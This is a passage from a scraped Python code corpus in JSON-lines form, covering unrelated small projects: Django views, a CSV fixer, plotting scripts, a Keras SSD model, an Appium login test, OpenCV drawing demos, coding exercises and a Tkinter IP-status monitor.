minTime[0]))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_208/318.py","file_name":"318.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15830858654","text":"from django.http import HttpResponse\n# from polls.models import Device\n# from polls.models import LogMsg\nfrom ORM.models import logs\nfrom ORM.models import Device\nfrom django.template import Context, loader\nfrom django.shortcuts import render_to_response\n\nfrom forms import FilterForm\nfrom ORM.models import AllDevicesId\n\nimport time\n# from MongoDb import *\n# from pymongo import Connection\n# from pymongo.errors import ConnectionFailure\n\nfrom django.middleware.csrf import get_token\n\ndef index(request):\n\t\n\t#~ devices_list = logs.objects.distinct('deviceId')\n\t#~ devices_list = Device.objects.order_by('deviceid')\n\tget_token(request)\n\tfilterForm=FilterForm()\n\t#~ print filterForm.as_table()\n\t\n\tdevices_list = Device.objects.all()\n\t\n\tdevices_list=list(devices_list)\n\t#~ devices_list=[Device(deviceId=AllDevicesId,lastActivityTime=max([x.lastActivityTime for x in devices_list if hasattr(x,'lastActivityTime')]))]+devices_list\n\t\n\t#~ devices_list.sort()\n\tlatest_poll_list = logs.objects.order_by('+time')\n\treturn render_to_response('polls/logList.html', {\n\t\t'latest_poll_list': latest_poll_list,\n\t\t'devices_list':devices_list,\n\t\t'error_message':'',\n\t\t'filterForm':filterForm,\n\t})\n\ndef detail(request, poll_id):\n\tget_token(request)\n\t# m=MongoDb()\n\t# return HttpResponse(\"You're looking at poll %s.\" % poll_id)\n\t# latest_poll_list=m.db.logs.find({})\n\t# latest_poll_list = LogMsg.objects.all()#.order_by('-deviceId')[:5]\n\t# l=logs(deviceId='00fe00898989',data='hi at '+str(time.time()))\n\t# l.save()\n\t#~ devices_list = logs.objects.values('deviceId')\n\t\n\t\n\t#~ devices_list=devices_list.sort()\n\t#~ latest_poll_list = logs.objects.all()#.order_by('-deviceId')[:5]\n\t#~ latest_poll_list = logs.objects(data='myNewMsg')\n\t#~ devices_list = logs.objects.distinct('deviceId')\n\t#~ devices_list.sort()\n\tdevices_list = Device.objects.all()\n\n\tdevices_list=list(devices_list)\n\tdevices_list=[Device(deviceId=AllDevicesId,lastActivityTime=min([x.lastActivityTime for x in devices_list]))]+devices_list\n\n\t\n\tlatest_poll_list = logs.objects(deviceId=poll_id).order_by('+time')\n\t#~ print 'formattedTime',latest_poll_list[-1].formattedTime\n\treturn render_to_response('polls/logList.html', {\n\t\t'latest_poll_list': latest_poll_list,\n\t\t'devices_list':devices_list,\n\t\t'error_message':'',\n\t})\n","repo_name":"voidoftime/LogServer","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"37434119533","text":"\n\"\"\"\nFix CSV files with newlines in some of the fields.\n\nDepends on every field being quoted and using double quotation marks for literal\nquotation marks in a field.\n\"\"\"\n\nfrom argparse import ArgumentParser\n\n\ndef fix_newlines(filename):\n \"\"\"Fix the newlines in the given file.\"\"\"\n with open(filename, encoding=\"ISO-8859-1\") as csvfile:\n # go through the csvfile finding lines with odd numbers of quotation\n # marks. When we hit one, collect up the field contents until we find another\n # one\n in_multiline = False\n multilines = []\n for line in csvfile:\n balanced = (line.count('\"') % 2 == 0)\n if in_multiline:\n multilines.append(line.rstrip()) # take off the newline here\n if balanced:\n # this is not the last line, just keep going\n pass\n else:\n # this is the last line of the section, emit everything\n print(\" \".join(l.rstrip() for l in multilines))\n multilines = []; in_multiline = False\n\n else: # not in a multi-line section\n if line.count('\"') % 2 == 0:\n # line has balanced quotes, just emit it\n print(line, end='') # line already has a newline at the end\n else:\n # line has unbalanced quotes so it starts a\n # multi-line section\n multilines.append(line.rstrip())\n in_multiline=True\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"input_filename\")\n\n args = parser.parse_args()\n fix_newlines(args.input_filename)\n","repo_name":"USDAForestService/NRM-Grants-Agreements","sub_path":"import/fix_csv_newlines.py","file_name":"fix_csv_newlines.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"69904673475","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport numpy as np\nimport pandas as pd\nimport matplotlib.ticker as ticker\n\n\n@ticker.FuncFormatter\ndef major_formatter(x, pos):\n label = str(int(-1*x)) if x >= 0 else str(x)\n return label\n\n\ndef forceAspect(ax,aspect=1):\n im = ax.get_images()\n extent = im[0].get_extent()\n ax.set_aspect(abs((extent[1]-extent[0])/(extent[3]-extent[2]))/aspect)\n\n\nalpha, gamma, mu, nu = np.loadtxt('postprocessing/data_models/it0100_npts0110.dat').T #Transposed for easier unpacking\n\nprint(\"len alpha:\", len(alpha))\nprint(\"len gamma:\", len(gamma))\n\nnrows, ncols = 100, 100\n\ngrid = mu.reshape((nrows, ncols))\n\n############## plot alpha gamma plane ########################################\nfig, ax = plt.subplots()\n\nax.yaxis.set_major_formatter(major_formatter)\nax.xaxis.set_major_formatter(major_formatter)\n\nplt.gca().set_aspect('equal', adjustable='box')\nplt.imshow(grid, extent=(alpha.min(), alpha.max(), gamma.max(), gamma.min()),\n interpolation='bessel', cmap=cm.viridis)#, origin=\"lower\")\n\n#### plot star at minimum point\n\nit, npts, alpha_hat, gamma_hat, mu_hat, nu_hat = np.loadtxt(\"postprocessing/minimum_predictions.dat\").T\n\nalpha_min = alpha_hat[-1]\ngamma_min = gamma_hat[-1]\n\nplt.plot(alpha_min, gamma_min, marker='*', markersize=15, color=\"red\")\n\nplt.gca().invert_yaxis()\n#plt.colorbar().set_label(u\"\\u03bc(x)\", size=12)\nplt.colorbar().set_label(u\"$g(x)$\", size=12)\ncbar_ax = fig.axes[-1]\ncbar_ax.tick_params(labelsize=15)\n\n\n\n##### plot black contour lines\nN = 25\nplt.tricontour(alpha, gamma, mu, N, colors='k',linewidths=1)\n\nplt.xticks(fontsize=12)\nplt.yticks(fontsize=12)\nplt.xlabel(r\"log($\\alpha$)\", fontsize=15)\nplt.ylabel(r\"log($\\gamma$)\", fontsize=15)\n\nax.set_aspect(2)\nforceAspect(ax,aspect=1)\n\n#plt.tight_layout()\n#plt.savefig(\"map_4k.png\", dpi=200)\nplt.show()\n","repo_name":"astuke/HyperTune","sub_path":"bo/plot_boss_colormap.py","file_name":"plot_boss_colormap.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39542764873","text":"import tensorflow as tf\nfrom keras.layers import Layer, Input, Conv2D, MaxPool2D, Activation\nfrom keras.models import Model\nfrom keras.applications import MobileNetV2\nfrom models.prediction_head import get_head_from_outputs\n# header\n# THIS ARCHITECTURE TOO BIG FOR GTX1050 3GB AND I5 7500 3.4 GHZ\n\ndef get_model(hyper_params):\n \"\"\"Generate ssd model and hyper params\n\n Args:\n hyper_params (dictionary): dictionary of parameter\n\n Output:\n ssd_model (tf.keras.Model): a ssd model with backbone vgg16\n \"\"\"\n img_size = hyper_params[\"img_size\"]\n # +1 for ratio 1 based in the original ssd paper\n base_model = MobileNetV2(input_shape=(img_size[1], img_size[0], 3), include_top=False)\n input_ = base_model.input\n conv_fm1 = base_model.get_layer(\"block_13_expand_relu\").output\n conv_fm2 = base_model.output\n # extra conv layer\n conv_fm3_1 = Conv2D(256, (1, 1), strides=(1, 1), padding=\"valid\", activation=\"relu\", name=\"conv_fm3_1\")(conv_fm2)\n conv_fm3_2 = Conv2D(512, (3, 3), strides=(2, 2), padding=\"same\", activation=\"relu\", name=\"conv_fm3_2\")(conv_fm3_1)\n #\n conv_fm4_1 = Conv2D(128, (1, 1), strides=(1, 1), padding=\"valid\", activation=\"relu\", name=\"conv_fm4_1\")(conv_fm3_2)\n conv_fm4_2 = Conv2D(256, (3, 3), strides=(2, 2), padding=\"same\", activation=\"relu\", name=\"conv_fm4_2\")(conv_fm4_1)\n #\n conv_fm5_1 = Conv2D(128, (1, 1), strides=(1, 1), padding=\"valid\", activation=\"relu\", name=\"conv_fm5_1\")(conv_fm4_2)\n conv_fm5_2 = Conv2D(256, (3, 3), strides=(2, 2), padding=\"same\", activation=\"relu\", name=\"conv_fm5_2\")(conv_fm5_1)\n #\n conv_fm6_1 = Conv2D(128, (1, 1), strides=(1, 1), padding=\"valid\", activation=\"relu\", name=\"conv_fm6_1\")(conv_fm5_2)\n conv_fm6_2 = Conv2D(256, (3, 3), strides=(2, 2), padding=\"same\", activation=\"relu\", name=\"conv_fm6_2\")(conv_fm6_1)\n \n\n pred_deltas, pred_labels = get_head_from_outputs(hyper_params, [conv_fm1, conv_fm2, conv_fm3_2, conv_fm4_2, conv_fm5_2, conv_fm6_2])\n # return Model(inputs=input_, outputs=[conv_fm1, conv_fm2, conv_fm3_2, conv_fm4_2, conv_fm5_2, conv_fm6_2])\n return Model(inputs=input_, outputs=[pred_deltas, pred_labels])\n\n\ndef init_model(model):\n \"\"\"Initiate model with dummy data for load weight with optimizer state and graph construction\n\n Args:\n model (tf.keras.Model): _description_\n \"\"\"\n _model = model(tf.random.uniform((1, 500, 500, 3)))\n # print(_model.summary())\n # print(_model[0].shape)\n # print(_model[1].shape)\n # print(_model[2].shape)\n # print(_model[3].shape)\n # print(_model[4].shape)\n # print(_model[5].shape)\n # a\n","repo_name":"Muhammadiqbal-git/SSD_TF_SKRIPSI","sub_path":"Workspace/code/models/ssd_mobilenet_v2.py","file_name":"ssd_mobilenet_v2.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13079688123","text":"#!/usr/bin/env python\n# _*_ coding:utf-8 _*_\n\nfrom appium import webdriver\n\n\nclass TestOne(object):\n\n def __init__(self, platformname, devicename, platformversion, apppackage,\n appactivity, unicodekeyboard, resetkeyboard):\n self.platformName = platformname\n self.deviceName = devicename\n self.platformVersion = platformversion\n self.appPackage = apppackage\n self.appActivity = appactivity\n self.unicodeKeyboard = unicodekeyboard\n self.resetKeyboard = resetkeyboard\n self.desired_caps = {\n 'platformName': self.platformName,\n 'deviceName': self.deviceName,\n 'platformVersion': self.platformVersion,\n 'appPackage': self.appPackage,\n 'appActivity': self.appActivity,\n 'resetKeyboard': self.resetKeyboard,\n 'unicodeKeyboard': self.unicodeKeyboard\n }\n\n def return_driver(self):\n driver = webdriver.Remote(\"http://127.0.0.1:4723/wd/hub\", self.desired_caps)\n return driver\n\n @staticmethod\n def target_click(x1, y1, driver): # x1,y1为你编写脚本时适用设备的实际坐标\n wd = driver\n x_1 = x1/1080 # 计算坐标在横坐标上的比例,其中375为iphone6s的宽\n y_1 = y1/1980 # 计算坐标在纵坐标667为iphone6s的高\n x = wd.get_window_size()['width'] # 获取设备的屏幕宽度\n y = wd.get_window_size()['height'] # 获取设备屏幕的高度\n print(x_1*x, y_1*y) # 打印出点击的坐标点\n wd.tap([(x_1*x, y_1*y)], 500) # 模拟单手点击操作\n\n\nif __name__ == '__main__':\n test_one = TestOne('Android', 'emulator-5554', '5.1.1', 'com.hbskjd.driver',\n 'com.hbskjd.driver.ui.login.LoginActivity', True, True)\n adriver = test_one.return_driver()\n print(type(adriver))\n adriver.implicitly_wait(8)\n # driver.find_element_by_id('android:id/button2').click()\n adriver.find_element_by_id(\"com.hbskjd.driver:id/login_phone\").send_keys('13168775547')\n adriver.find_element_by_id('com.hbskjd.driver:id/login_psw').send_keys('123456')\n adriver.find_element_by_id('com.hbskjd.driver:id/login_finish').click()\n","repo_name":"1655490577/StudyCodes","sub_path":"OldProject/历史文件/webdriver/appium/Aoneone.py","file_name":"Aoneone.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33543166414","text":"#!/bash/bin/python\n\nfrom imutils import perspective\nfrom skimage.filters import threshold_local\nimport cv2\nimport imutils\nimport numpy as np\n \nimage = cv2.imread(\"chass2.jpeg\")\nw=image.shape[0]\nh=image.shape[1]\nratio = image.shape[0] / 500.0 \norig = image.copy()\nimage = imutils.resize(image, height=500)\n \ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ngray = cv2.GaussianBlur(gray, (5, 5), 0)\nedged = cv2.Canny(gray, 75, 200)\n \ncnts= cv2.findContours(edged.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE) \ncnts = cnts[0] if imutils.is_cv2() else cnts[1] \ncnts = sorted(cnts, key=cv2.contourArea, reverse=True)[:5] \n \nfor c in cnts:\n peri = cv2.arcLength(c, True)\n approx = cv2.approxPolyDP(c, 0.01 * peri, True)\n if len(approx) == 4: \n screenCnt = approx\n break\n \n \npoint1=screenCnt.reshape(4,2).astype(np.float32)\n# point2 = np.array([[0,0],[0,420],[297,420],[297,0]],dtype = \"float32\")\npoint2 = np.array([[104,58],[104,478],[401,478],[401,58]],dtype = \"float32\")\n \n# point1 = np.array([[308,230],[500,230],[308,640],[500,640]],dtype = \"float32\")\n# point2 = np.array([[308,230],[500,230],[155,30],[835,30]],dtype = \"float32\")\nM = cv2.getPerspectiveTransform(point1,point2)\nout_img = cv2.warpPerspective(image,M,(image.shape[0],700))\ndst=cv2.perspectiveTransform(point2.reshape(1,4,2), M)\n \n \ncv2.imshow(\"Original\", image)\ncv2.imshow(\"Scanned\",cv2.resize(out_img,(image.shape[0],700)))\ncv2.waitKey(0)","repo_name":"lybhit/py_tools","sub_path":"scripts/perspec_transform.py","file_name":"perspec_transform.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41508694947","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\n\r\n'''\r\n# eg.7\r\nimg = np.zeros((512, 512, 3), np.uint8)\r\n\r\n# 画线\r\ncv2.line(img, (0, 0), (511, 511), (255, 0, 0), 5)\r\n# 画矩形\r\ncv2.rectangle(img, (384, 0), (510, 128), (0, 255, 0), 3)\r\n# 画圆\r\ncv2.circle(img, (447, 63), 63, (0, 0, 255), -1)\r\n# 画椭圆\r\ncv2.ellipse(img, (256, 256), (100, 50), 0, 0, 180, 255, -1)\r\n# 画多边形\r\npts = np.array([[10, 5], [20, 30], [70, 20], [50, 10]], np.int32)\r\npts.reshape((-1, 1, 2))\r\n# 第一个参数为-1,表明这一维度的长度是根据后面的维度计算出来的\r\n\r\n# 写字\r\nfont = cv2.FONT_HERSHEY_SIMPLEX\r\ncv2.putText(img, 'OpenCV', (10, 500), font, 4, (255, 255, 255), 2)\r\n\r\n# 显示\r\nwinname = 'eg.7'\r\ncv2.namedWindow(winname)\r\ncv2.imshow(winname, img)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n\r\n# eg.8\r\nevents = [i for i in dir(cv2) if 'EVENT' in i]\r\nprint(events)\r\n\r\n# eg.9\r\n# 在图片上双击过的位置绘制一个圆圈\r\n\r\n\r\ndef draw_circle(event, x, y, flags, param):\r\n if event == cv2.EVENT_MBUTTONDBLCLK:\r\n cv2.circle(img, (x, y), 100, (255, 0, 0), -1)\r\n\r\n\r\nimg = np.zeros((512, 512, 3), np.uint8)\r\ncv2.namedWindow('eg.9')\r\ncv2.setMouseCallback('eg.9', draw_circle)\r\n\r\nwhile(1):\r\n cv2.imshow('eg.9', img)\r\n if cv2.waitKey(20) & 0xFF == 27:\r\n break\r\ncv2.destroyAllWindows()\r\n'''\r\n\r\n# eg.10\r\n# 根据选择的模式在拖动鼠标时绘制矩形或者是圆圈(就像画图程序中一样)\r\n\r\n# 当鼠标按下时变成True\r\ndrawing = False\r\n# 如果mode为True绘制矩形。按下'm' 变成绘制曲线\r\nmode = True\r\nix, iy = -1, -1\r\n\r\n\r\n# 创建回调函数\r\ndef draw_circle(event, x, y, flags, param):\r\n global ix, iy, drawing, mode\r\n # 当按下左键时返回起始坐标位置\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n drawing = True\r\n ix, iy = x, y\r\n # 当按下鼠标左键移动时绘制图形,event可以查看移动,flag查看是否按下\r\n elif event == cv2.EVENT_MOUSEMOVE and flags == cv2.EVENT_FLAG_LBUTTON:\r\n if drawing == True:\r\n if mode == True:\r\n cv2.rectangle(img, (ix, iy), (x, y), (0, 255, 0), -1)\r\n else:\r\n # 绘制圆圈,小圆圈连在一起就成了线,3代表了笔画的粗细\r\n cv2.circle(img, (x, y), 3, (0, 0, 255), -1)\r\n # 下面注释掉的代码是起始点为圆心,起点到终点为半径的\r\n # r = int(np.sqrt((x - ix)**2 + (y - iy)**2))\r\n # cv2.circle(img, (x, y), r, (0, 0, 255), -1)\r\n # 当鼠标松开时停止绘画\r\n elif event == cv2.EVENT_LBUTTONUP:\r\n drawing == False\r\n # if mode == True:\r\n # cv2.rectangle(img, (ix, iy), (x, y), (0, 255, 0), -1)\r\n # else:\r\n # cv2.circle(img, (x, y), 5, (0, 0, 255), -1)\r\n\r\n\r\nimg = np.zeros((512, 512, 3), np.uint8)\r\ncv2.namedWindow('eg.10')\r\ncv2.setMouseCallback('eg.10', draw_circle)\r\nwhile(1):\r\n cv2.imshow('eg.10', img)\r\n k = cv2.waitKey(1) & 0xFF\r\n if k == ord('m'):\r\n mode = not mode\r\n elif k == 27:\r\n break","repo_name":"EXfeiniao/some-code","sub_path":"OpenCv/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24985211237","text":"from tkinter import *\nimport tkinter.font as tkFont\nfrom main import *\nfrom Classes import IP_address\n\nbackground_color=\"#DFDFDF\"\n\ndef add_header(root):\n header_frame = Frame(root, width=500, height=50, bg=background_color)\n header_frame.grid(row=0, column=0, padx=10, pady=5, sticky='w' + 'e' + 'n' + 's')\n\n Label(header_frame, font=('Helvetica', 12, 'bold'), text=\" \", justify=LEFT, bg=background_color) \\\n .grid(row=0, column=0, padx=0, pady=5)\n Label(header_frame, font=('Helvetica', 12, 'bold'), text=\"שם רשת\", justify=LEFT, bd=5, bg=background_color) \\\n .grid(row=0, column=1, padx=40, pady=5)\n Label(header_frame, font=('Helvetica', 12, 'bold'), text=\"IP כתובת\", bg=background_color) \\\n .grid(row=0, column=2, padx=40, pady=5)\n Label(header_frame, font=('Helvetica', 12, 'bold'), text=\"סטאטוס פעילות\", bg=background_color) \\\n .grid(row=0, column=3, padx=30, pady=5)\n Label(header_frame, font=('Helvetica', 12, 'bold'), text=\"עדכון אחרון\", justify=RIGHT, bg=background_color) \\\n .grid(row=0, column=4, padx=15, pady=5)\n\ndef add_body(root, list_of_all_addresses):\n middle_frame = Frame(root, width=700, height=300, bg=background_color)\n middle_frame.grid(row=1, column=0, padx=10, pady=5)\n\n canvas = Canvas(middle_frame, width=620, height=300, borderwidth=0, bg=background_color, highlightthickness=0)\n frame = Frame(canvas, bg=background_color)\n vsb = Scrollbar(middle_frame, orient=\"vertical\", command=canvas.yview, bg=background_color)\n canvas.configure(yscrollcommand=vsb.set)\n\n vsb.pack(side=\"right\", fill=\"y\")\n canvas.pack(side=\"left\", fill=\"both\", expand=False)\n canvas.create_window((4, 4), window=frame, anchor=\"nw\")\n\n frame.bind(\"\", lambda event, canvas=canvas: onFrameConfigure(canvas))\n\n insert_to_middle(frame, list_of_all_addresses)\n\ndef add_footer(root):\n\n footer_frame = Frame(root, width=700, height=150, bg=background_color)\n footer_frame.grid(row=2, column=0, padx=10, pady=5, sticky='w' + 'e' + 'n' + 's')\n\n Button(footer_frame, activeforeground=\"green\", text=\" חדשה IP הוסף כתובת \",\n bd=4, command=lambda: new_ip_window(root,footer_frame), font=('Helvetica', 12, 'bold')) \\\n .grid(row=0, column=0, padx=100, pady=5, sticky='w' + 'e' + 'n' + 's')\n\n Button(footer_frame, text=\"התחל סריקה\", command= lambda: new_scanning(root), bd=4,\n font=('Helvetica', 12, 'bold')) \\\n .grid(row=1, column=1, padx=80, pady=5, sticky='w' + 'e' + 'n' + 's')\n\ndef ok_clicked(main_ui_footer, new_ip_window,ip_number, ip_name):\n ip = ip_number.get()\n name = ip_name.get()\n print(ip, name)\n\n path = \"first_data.xlsx\"\n\n add_data_to_file(path, name, ip)\n\n Label(main_ui_footer, text=\"יש לסרוק בשנית על מנת לראות את הכתובת שהתווספה\", bg=background_color,\n font=('Helvetica', 12, 'bold')).grid(row=1, column=0, padx=10, pady=0)\n\n new_ip_window.destroy()\n\ndef cancel_clicked(root):\n print(\"cancel window\")\n root.destroy()\n\ndef new_ip_window(root, main_footer):\n new_ip_window = Toplevel(root)\n new_ip_window.title(\"New Window\")\n new_ip_window.config(bg=background_color)\n\n # Create three frames -> header -- middle -- footer\n header_frame = Frame(new_ip_window, width=300, height=50, bg=background_color)\n header_frame.grid(row=0, column=0, padx=10, pady=5)\n\n body_frame = Frame(new_ip_window, width=300, height=200, bg=background_color)\n body_frame.grid(row=1, column=0, padx=10, pady=5)\n\n footer_frame = Frame(new_ip_window, width=300, height=100, bg=background_color)\n footer_frame.grid(row=2, column=0, padx=10, pady=5, sticky='w' + 'e' + 'n' + 's')\n # ---------------------------------------------------------------------------\n ip_name = StringVar()\n ip_number = StringVar()\n\n Label(header_frame, text=\"חדשה IP הוספת כתובת\", bg=background_color, font=('Helvetica', 12, 'bold')).grid(row=0, column=0, padx=10, pady=5)\n\n Label(body_frame, text=\":שם\", bg=background_color).grid(row=0, column=1, padx=10, pady=5)\n name_entry = Entry(body_frame, textvariable = ip_name).grid(row=0, column=0, padx=10, pady=5)\n\n Label(body_frame, text=\":IP כתובת\", bg=background_color).grid(row=1, column=1, padx=10, pady=5)\n ip_entry = Entry(body_frame, textvariable = ip_number).grid(row=1, column=0, padx=10, pady=5)\n\n Button(footer_frame, activeforeground=\"green\", text=\" אישור \",\n command=lambda: ok_clicked(main_footer, new_ip_window, ip_number, ip_name), font=('Helvetica', 10, 'bold')) \\\n .grid(row=0, column=0, padx=5, pady=5)\n\n Button(footer_frame, text=\" ביטול \", command=lambda: cancel_clicked(new_ip_window),\n font=('Helvetica', 10, 'bold'))\\\n .grid(row=0, column=1, padx=5, pady=5)\n\ndef new_scanning(old_window):\n list_of_all_addresses = main_algo()\n print(\"new window opened\")\n old_window.destroy()\n abc = Tk()\n creating_window(abc, list_of_all_addresses)\n\ndef onFrameConfigure(canvas):\n #Reset the scroll region to encompass the inner frame\n canvas.configure(scrollregion=canvas.bbox(\"all\"))\n\ndef insert_to_middle(frame, list_of_all_addresses):\n\n i = 1\n font_style = tkFont.Font(family=\"Lucida Grande\", size=14)\n font_time_style = tkFont.Font(family=\"Lucida Grande\", size=10)\n\n for key in list_of_all_addresses:\n Label(frame, text=\"%s\" % i, width=3, borderwidth=\"1\", bg=background_color,\n relief=\"solid\").grid(row=i, column=0, padx=5, pady=5)\n\n name = list_of_all_addresses[key].name\n ip = list_of_all_addresses[key].ip\n status = list_of_all_addresses[key].status\n last_modify = list_of_all_addresses[key].modify\n\n Label(frame, text=name, font = font_style, anchor= \"w\", bg=background_color).grid(row=i, column=1, padx=5, pady=5)\n Label(frame, text=ip, font = font_style, bg=background_color).grid(row=i, column=2, padx=5, pady=5)\n\n # xyz = tk.Frame(frame, background=\"red\").grid(row=i, column=3, padx=10, pady=1)\n if status == \"work\":\n color = '#489640'\n else:\n color = '#c62121'\n Label(frame, text=\" \",\n font=font_style, bg=color).grid(row=i, column=3, padx=5, pady=5)\n Label(frame, text=last_modify, font = font_time_style, bg=background_color).grid(row=i, column=4, padx=5, pady=5)\n i += 1\n\ndef creating_window(window_name, list_of_all_addresses):\n\n window_name.title(\"Ping Swipping\")\n window_name.config(bg=background_color)\n\n\n # Create three frames -> header -- middle -- footer\n add_header(window_name)\n add_body(window_name, list_of_all_addresses)\n add_footer(window_name)\n\n\nif __name__ == '__main__':\n\n # run the algo and show the object\n list_of_all_addresses = read_old_data()\n\n root = Tk() # create root window\n root.iconbitmap(\"icon_image.ico\")\n creating_window(root, list_of_all_addresses)\n\n root.mainloop()\n\n","repo_name":"David-Elkabas/IP-sweeper","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":7065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38217178599","text":"import rasterio\nimport socket\nimport json\nimport pandas as pd \n\n\n# In 3857\ndata = pd.read_csv(\"/Users/zzz/exp/jrc/sqkm/grid/grid_mos.csv\") \n\n# left,top,right,bottom,id\nsales = []\n\n# In 3857\nwith rasterio.open('/Users/zzz/exp/jrc/sqkm/GHS_BUILT_LDS2014_GLOBE_R2016A_54009_1k_v1_0/GHS_BUILT_LDS2014_GLOBE_R2016A_54009_1k_v1_0_3857.tif') as src:\n \n for index, row in data.iterrows():\n centre_x = (row['left']+row['right'])/2\n centre_y = (row['top']+row['bottom'])/2\n # print(centre_x, centre_y)\n vals = src.sample([(centre_x, centre_y)])\n for val in vals:\n # print(val)\n sales.append({'left': row['left'], 'top': row['top'], 'right': row['right'], 'bottom': row['bottom'], 'id': row['id'], 'dn': val[0]})\n\ndf = pd.DataFrame(sales)\n\nprint(df)\n\ndf.to_csv (r'/Users/zzz/exp/jrc/sqkm/bruned/raster_mos.csv', index = None, header=True) #Don't forget to add '.csv' at the end of the path\n","repo_name":"GIScience/socialmedia2traffic-webmap-server","sub_path":"miss/scripts/raster_get_dn_at_xy.py","file_name":"raster_get_dn_at_xy.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25058709975","text":"def solution(sticker):\n N = len(sticker)\n table1 = [0]*N\n table2 = [0]*N\n\n table1[0] = sticker[0]\n \n\n ## 첫 스티커 선택\n for i in range (1,N-1):\n table1[i] = max(table1[i-2]+sticker[i],table1[i-1])\n print(table1)\n\n for i in range (1,N):\n table2[i] = max(table2[i-2]+sticker[i],table2[i-1])\n print(table2)\n\n return max(table1[-2],table2[-1])\n\n\n\n\nQ1 = [14, 6, 5, 11, 3, 9, 2, 10] # 36\nQ2 = [1, 3, 2, 5, 4] # 8\nQ3 = [1]\n\nsolution(Q3)\n","repo_name":"aver1001/github-practice","sub_path":"programmers/Level 3/스티커 모으기 (2)/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33754315208","text":"def move_zeros(array):\n #your code here\n new_array = [] \n \n new_index = 0\n while len(array) > 0:\n item = array.pop(0)\n if item == 0 and type(item) == int:\n new_array.append(item)\n else:\n new_array.insert(new_index, item)\n new_index = new_index + 1\n return new_array\n\n \n\nprint(move_zeros([1,2,0,1,0,1,0,3,0,1]))\nprint(move_zeros([9,0.0,0,9,1,2,0,1,0,1,0.0,3,0,1,9,0,0,0,0,9]))\n\nprint( False == 0 )","repo_name":"code-knayam/DataStructureAlgorithms","sub_path":"code-wars/002.move_zeros_to_end.py","file_name":"002.move_zeros_to_end.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26089152135","text":"class Solution:\n def minDeletionSize(self, strs: List[str]) -> int:\n \n unsorted = 0\n n = len(strs[0])\n for i in range(n):\n # char = strs[0][i]\n ith_list = []\n for ch in strs:\n ith_list.append(ch[i])\n if sorted(ith_list) != ith_list:\n unsorted += 1\n return unsorted","repo_name":"Rediet-Ferew/competitive-programming","sub_path":"0944-delete-columns-to-make-sorted/0944-delete-columns-to-make-sorted.py","file_name":"0944-delete-columns-to-make-sorted.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13123075126","text":"import sys\nimport collections\nfrom collections import defaultdict\nfrom collections import OrderedDict\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\nclass stats:\n\n\n\tvlist = None #Tuple list of all V sequence types and their quality\n\tjlist = None #Typle list of all J sequence types and their quality\n\tdlist = None #Tuple list of all D sequence types and their quality\n\n\tvgenes = defaultdict() #Ordered Dict of all vgene types and their count\n\tjgenes = defaultdict() #Ordered Dict of all vgene types and their count\n\tdgenes = defaultdict() #Ordered Dict of all vgene types and their count\n\n\n\t#import and parse the file this class will use around\n\tdef __init__(self, filename):\n\n\t\tprint(\"\\n************************************************************\")\n\t\tprint(\"************READING AND CLEANING ANNOTATION DATA************\")\n\t\tprint(\"***************...this may take a second...*****************\\n\")\n\t\tdf = pd.read_csv(filename, sep='\\t')\n\t\tself.vlist = df.allVHitsWithScore.tolist()\n\t\tself.jlist = df.allJHitsWithScore.tolist()\n\t\tself.dlist = df.allDHitsWithScore.tolist()\n\t\t\n\t\tself.cleanData(self.vlist)\n\t\tself.cleanData(self.jlist)\n\t\tself.cleanData(self.dlist)\n\t\tprint(\"done!\")\n\n\t#Returns dict {chain-name, chain-count}\n\tdef geneCount(self, datalist):\n\t\ttally = defaultdict()\n\t\tfor gene, quality in datalist:\n\t\t\tif len(gene)>0:\n\t\t\t\tif gene in tally:\n\t\t\t\t\ttally[gene] += 1\n\t\t\t\telse:\n\t\t\t\t\ttally.update({gene:1})\n\t\treturn OrderedDict(sorted(tally.items(),key=lambda t: t[0]))\n\n\n\t#Get read element chain type\n\tdef getChain(self, data):\n\t\ti = data.find(\"*\")\n\t\tif i == -1:\n\t\t\treturn None\n\t\treturn 